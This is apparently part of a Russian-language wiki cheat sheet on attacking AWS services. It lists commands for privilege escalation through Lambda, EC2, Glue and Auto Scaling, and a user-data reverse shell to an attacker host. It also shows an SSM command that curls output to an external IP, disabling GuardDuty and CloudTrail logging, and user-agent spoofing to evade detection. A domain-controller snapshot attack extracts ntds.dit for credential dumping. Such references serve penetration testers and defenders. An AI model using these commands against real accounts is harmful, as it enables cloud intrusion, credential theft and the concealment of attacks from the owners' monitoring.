* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

https://aws.amazon.com/ru/augmented-ai/

== CodeGuru ==

https://aws.amazon.com/ru/codeguru/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

